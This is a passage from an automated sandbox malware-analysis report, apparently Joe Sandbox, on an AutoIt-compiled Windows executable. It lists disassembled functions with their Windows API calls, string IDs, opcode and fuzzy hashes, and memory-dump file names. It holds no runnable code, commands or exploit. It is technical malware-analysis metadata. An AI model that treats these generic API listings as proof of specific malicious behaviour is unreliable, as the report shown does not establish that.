                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                  • API String ID: 537147316-3738523708
                                                                                  • Opcode ID: 042513bd0a5227504a92755ff8d797cf312849e845c43ecade19f14e87c70556
                                                                                  • Instruction ID: 1874e6b1860507ebccfc4c52fc94275e3d4228f81597712d39478b6c76928b74
                                                                                  • Opcode Fuzzy Hash: 042513bd0a5227504a92755ff8d797cf312849e845c43ecade19f14e87c70556
                                                                                  • Instruction Fuzzy Hash: DD027031208341AFCB24EF24C991EAFBBF5AF99354F10491DF496972A2DB30D949CB52
                                                                                  Function 00AEAEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(?,?,00B10980), ref: 00AEAF4E
                                                                                  • GetDriveTypeW.KERNEL32(00000061,00B3B5F0,00000061), ref: 00AEB018
                                                                                  • _wcscpy.LIBCMT ref: 00AEB042
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                  • API String ID: 2820617543-1000479233
                                                                                  • Opcode ID: 8e4236369f8198b05c28735d46c0b51bad1df232adb2d97a8f87f05154b4fe66
                                                                                  • Instruction ID: e5123d016a4c9ac1416e57fe098715c425022d461096a7d9a302712894c5bea9
                                                                                  • Opcode Fuzzy Hash: 8e4236369f8198b05c28735d46c0b51bad1df232adb2d97a8f87f05154b4fe66
                                                                                  • Instruction Fuzzy Hash: 6451CC722183469FC710EF15CA91AABB7E5EFA4300F60481DF596472A2EB30ED09CB52
                                                                                  Function 00A84D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __i64tow__itow__swprintf
                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                  • API String ID: 421087845-2263619337
                                                                                  • Opcode ID: ea2d92c5ebc830d5c9b4cad0b92703cb13b581556d8ee5b0db0b793ec6c3738e
                                                                                  • Instruction ID: 647a189cb234ec2b06067beb98cd595d71b373eb044ca6de6025f06d3c68e0db
                                                                                  • Opcode Fuzzy Hash: ea2d92c5ebc830d5c9b4cad0b92703cb13b581556d8ee5b0db0b793ec6c3738e
                                                                                  • Instruction Fuzzy Hash: 3941B37160420AAFEB24EF78D941EAA77F8EB49340F20446EE549D7292EB3199418710
                                                                                  Function 00B07777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00B0778F
                                                                                  • CreateMenu.USER32 ref: 00B077AA
                                                                                  • SetMenu.USER32(?,00000000), ref: 00B077B9
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B07846
                                                                                  • IsMenu.USER32(?), ref: 00B0785C
                                                                                  • CreatePopupMenu.USER32 ref: 00B07866
                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B07893
                                                                                  • DrawMenuBar.USER32 ref: 00B0789B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                  • String ID: 0$F
                                                                                  • API String ID: 176399719-3044882817
                                                                                  • Opcode ID: 7c7c8e5d684bb453cdf060b7f4e8d1851c4219e1ae8c4d84478cca2e3ed7aeec
                                                                                  • Instruction ID: 8ddbb137d1f5af91eab640bffacb3079460eb9982a7cfa22b7d0da5128e8da6e
                                                                                  • Opcode Fuzzy Hash: 7c7c8e5d684bb453cdf060b7f4e8d1851c4219e1ae8c4d84478cca2e3ed7aeec
                                                                                  • Instruction Fuzzy Hash: 8F413974A00209EFDB10DF65D888A9ABBF5FF49310F1485A9F945A7390DB70AD10CF50
                                                                                  Function 00B07AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B07B83
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00B07B8A
                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B07B9D
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00B07BA5
                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B07BB0
                                                                                  • DeleteDC.GDI32(00000000), ref: 00B07BB9
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00B07BC3
                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B07BD7
                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B07BE3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                  • String ID: static
                                                                                  • API String ID: 2559357485-2160076837
                                                                                  • Opcode ID: 26496bf6bcbed5d577e42a3aa6d9835f22b1d50cf374e72301d1cccac165b8fa
                                                                                  • Instruction ID: 627961d14c9548f6b83d428f7812a069ba21897db7c948aa89ee0cd32981bae5
                                                                                  • Opcode Fuzzy Hash: 26496bf6bcbed5d577e42a3aa6d9835f22b1d50cf374e72301d1cccac165b8fa
                                                                                  • Instruction Fuzzy Hash: D2318A32104219ABDF11AF64DC49FDB7FA9FF09320F104255FA55A61E0CB75E860DBA0
                                                                                  Function 00AA7030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AA706B
                                                                                    • Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58
                                                                                  • __gmtime64_s.LIBCMT ref: 00AA7104
                                                                                  • __gmtime64_s.LIBCMT ref: 00AA713A
                                                                                  • __gmtime64_s.LIBCMT ref: 00AA7157
                                                                                  • __allrem.LIBCMT ref: 00AA71AD
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA71C9
                                                                                  • __allrem.LIBCMT ref: 00AA71E0
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA71FE
                                                                                  • __allrem.LIBCMT ref: 00AA7215
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA7233
                                                                                  • __invoke_watson.LIBCMT ref: 00AA72A4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                  • String ID:
                                                                                  • API String ID: 384356119-0
                                                                                  • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                  • Instruction ID: b151e5df876914c4745625510b657f1ac2cd7745b371433e9031b2bef797cd9c
                                                                                  • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                  • Instruction Fuzzy Hash: EF71D272A04716ABDB149F79CD81BAFB7B8AF16320F14422AF514E72C2E774DA448790
                                                                                  Function 00AE2CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AE2CE9
                                                                                  • GetMenuItemInfoW.USER32(00B47890,000000FF,00000000,00000030), ref: 00AE2D4A
                                                                                  • SetMenuItemInfoW.USER32(00B47890,00000004,00000000,00000030), ref: 00AE2D80
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00AE2D92
                                                                                  • GetMenuItemCount.USER32(?), ref: 00AE2DD6
                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00AE2DF2
                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00AE2E1C
                                                                                  • GetMenuItemID.USER32(?,?), ref: 00AE2E61
                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AE2EA7
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE2EBB
                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AE2EDC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4176008265-0
                                                                                  • Opcode ID: 8858c905212af1af4760e7dec02058b49225e394307166a738d6ed37d4f0988c
                                                                                  • Instruction ID: 6ceaef0477b98ad1a0e53d1e87785269083c37a7535ef611175946cd88650505
                                                                                  • Opcode Fuzzy Hash: 8858c905212af1af4760e7dec02058b49225e394307166a738d6ed37d4f0988c
                                                                                  • Instruction Fuzzy Hash: 7C61AAB0900299AFEF21DF66CD88AEEBFBDEB01304F144559F941A7251DB71AE45CB20
                                                                                  Function 00B07548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B075CA
                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B075CD
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B075F1
                                                                                  • _memset.LIBCMT ref: 00B07602
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B07614
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B0768C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                  • String ID:
                                                                                  • API String ID: 830647256-0
                                                                                  • Opcode ID: fb03cc28c621c4a122b5ab41814ace0a9efee35a3711ae8d8803b94dafe9d46c
                                                                                  • Instruction ID: c4729f34c2894ba0344c44bd3b7a3fc152224e2045a7fdb489dbdff5f93cd4e2
                                                                                  • Opcode Fuzzy Hash: fb03cc28c621c4a122b5ab41814ace0a9efee35a3711ae8d8803b94dafe9d46c
                                                                                  • Instruction Fuzzy Hash: FC616F75944208AFDB10DF64CC85EEEBBF8EB09710F104195FA15A72E1DB70AE41DB50
                                                                                  Function 00AD77B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AD77DD
                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00AD7836
                                                                                  • VariantInit.OLEAUT32(?), ref: 00AD7848
                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AD7868
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00AD78BB
                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AD78CF
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AD78E4
                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00AD78F1
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AD78FA
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AD790C
                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AD7917
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                  • String ID:
                                                                                  • API String ID: 2706829360-0
                                                                                  • Opcode ID: ba2759f37f052e5043d529b156f64db13f9447df08322cff9b8dc43b141defe4
                                                                                  • Instruction ID: fec05702a363486291d8a74a493e2352e44daccbd554f0e26a5e25e219a29b0e
                                                                                  • Opcode Fuzzy Hash: ba2759f37f052e5043d529b156f64db13f9447df08322cff9b8dc43b141defe4
                                                                                  • Instruction Fuzzy Hash: DC415235A041199FCB04EFA4D8889EDBBB9FF48340F40C069E956A7361DB70AA85CF90
                                                                                  Function 00AE0508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetKeyboardState.USER32(?), ref: 00AE0530
                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00AE05B1
                                                                                  • GetKeyState.USER32(000000A0), ref: 00AE05CC
                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00AE05E6
                                                                                  • GetKeyState.USER32(000000A1), ref: 00AE05FB
                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00AE0613
                                                                                  • GetKeyState.USER32(00000011), ref: 00AE0625
                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00AE063D
                                                                                  • GetKeyState.USER32(00000012), ref: 00AE064F
                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00AE0667
                                                                                  • GetKeyState.USER32(0000005B), ref: 00AE0679
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: State$Async$Keyboard
                                                                                  • String ID:
                                                                                  • API String ID: 541375521-0
                                                                                  • Opcode ID: 9e58867c8c5ec4b98c52353e15eb6476534b77dcec92489642d98ade6125d252
                                                                                  • Instruction ID: a8f861f2c5411b2feca859db13d38fa68a65b3c9dba653dbe9e8d158cd62b548
                                                                                  • Opcode Fuzzy Hash: 9e58867c8c5ec4b98c52353e15eb6476534b77dcec92489642d98ade6125d252
                                                                                  • Instruction Fuzzy Hash: 6541D7305047CA6DFF319B658804BB6BEA16B61304F48C05AD9C6575C2EBE899D8CFB2
                                                                                  Function 00AF8AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • CoInitialize.OLE32 ref: 00AF8AED
                                                                                  • CoUninitialize.OLE32 ref: 00AF8AF8
                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00B13BBC,?), ref: 00AF8B58
                                                                                  • IIDFromString.OLE32(?,?), ref: 00AF8BCB
                                                                                  • VariantInit.OLEAUT32(?), ref: 00AF8C65
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AF8CC6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                  • API String ID: 834269672-1287834457
                                                                                  • Opcode ID: bf29909f361a97d756c6d088526087abeac117be204bcae6609377de123a0228
                                                                                  • Instruction ID: 590b3be31264fbd2ae6788591ff22ec4248c7c73d93c77c27d87d32b88b1d917
                                                                                  • Opcode Fuzzy Hash: bf29909f361a97d756c6d088526087abeac117be204bcae6609377de123a0228
                                                                                  • Instruction Fuzzy Hash: B061AF702087159FC710EF94C988F6EB7E4AF49714F104849FA859B291DB78ED49CBA2
                                                                                  Function 00AEBB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00AEBB13
                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00AEBB89
                                                                                  • GetLastError.KERNEL32 ref: 00AEBB93
                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00AEBC00
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                  • API String ID: 4194297153-14809454
                                                                                  • Opcode ID: 2789685b497c826d158cbcd15b8d26ddd46bfd94f0aa39b0e6bfd56392e01ef9
                                                                                  • Instruction ID: e1341a57840656949638470e363ad23539eb7ef802b69b5940b4bcd423d60c86
                                                                                  • Opcode Fuzzy Hash: 2789685b497c826d158cbcd15b8d26ddd46bfd94f0aa39b0e6bfd56392e01ef9
                                                                                  • Instruction Fuzzy Hash: 7531B735A10249AFCB10EF66C949EAEB7B4EF44310F24815AF505DB295DB709D41CBA1
                                                                                  Function 00AD9B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AD9BCC
                                                                                  • GetDlgCtrlID.USER32 ref: 00AD9BD7
                                                                                  • GetParent.USER32 ref: 00AD9BF3
                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AD9BF6
                                                                                  • GetDlgCtrlID.USER32(?), ref: 00AD9BFF
                                                                                  • GetParent.USER32(?), ref: 00AD9C1B
                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00AD9C1E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 1536045017-1403004172
                                                                                  • Opcode ID: cdac735a7b707e97617b209e70c4c303f984a7f5cd24c839edc14cc3c29f3366
                                                                                  • Instruction ID: b5fbef77746939a958c1e7e4f83a6e4efb8c025826b99e43cd00f6fc34dc1f8f
                                                                                  • Opcode Fuzzy Hash: cdac735a7b707e97617b209e70c4c303f984a7f5cd24c839edc14cc3c29f3366
                                                                                  • Instruction Fuzzy Hash: D421CF74A00204BFCF04ABA0CC85EFEBBB9EF95310F604156F962932A1DF759865DA20
                                                                                  Function 00AD9C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AD9CB5
                                                                                  • GetDlgCtrlID.USER32 ref: 00AD9CC0
                                                                                  • GetParent.USER32 ref: 00AD9CDC
                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AD9CDF
                                                                                  • GetDlgCtrlID.USER32(?), ref: 00AD9CE8
